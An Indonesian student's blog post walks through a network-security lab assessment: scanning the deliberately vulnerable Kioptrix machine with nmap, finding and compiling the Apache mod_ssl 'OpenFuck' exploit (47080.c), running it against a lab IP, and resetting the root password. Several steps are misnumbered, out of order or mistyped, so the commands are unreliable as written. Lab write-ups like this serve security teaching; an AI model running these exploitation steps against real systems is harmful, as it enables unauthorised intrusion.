Ini adalah blog Ahmad Naufal Maulana dari D3TK4203. disini saya akan menjelasakan Asesmen 1 Keamanan Jaringan. Berikut langkah-langkahnya :
Persiapan :
1. Download Kali Linux di sini
2. Download Virtual Box di sini
3. Download Kioptrix di sini
Prakter :
1. Setelah semua terinstal, buka virtual box dan add Kali Linux dan Kioptrix
3. Buka terminal di Kali Linux dan ketik sudo su ifconfig untuk mengetahui IP Address kita
5. Ketik nmap -sS -sV -Pn -O 192.168.1.104 untuk melihat informasi port yang terbuka dan OS yang digunakan
search pada web browser "exploit apache 1.3.20" dan cari file 47080.c7. Install libssl-dev dengan ketik apt install libssl-dev
Kita akan mengincar port 80 HTTP dengan server Apache dan OS Red-Hat (catat versinya)
6. Kita akan melakukan eksploit dan sebelum itu kita cari dulu tools untuk eksploit mod_ssl. ketik searchsploi mod_ssl
8. Pindah ke direktori Downloads, compile file 47080.c dengan ketik gcc -o OpenDuck 47080.c -lcrypto
10. Cari value dari OS dan Versi apache yang sesuai dengan info yang kita dapat diawal
11. Ketik -./OpenFuck (value) 0x6b (host)192.168.1.104 -c (range)60
12. Ketik whoami untuk mngetahui login user dan ketik passwd untuk membuat password baru
13. Masuk ke Krioptrix dengan user dan password tadi
0 Comments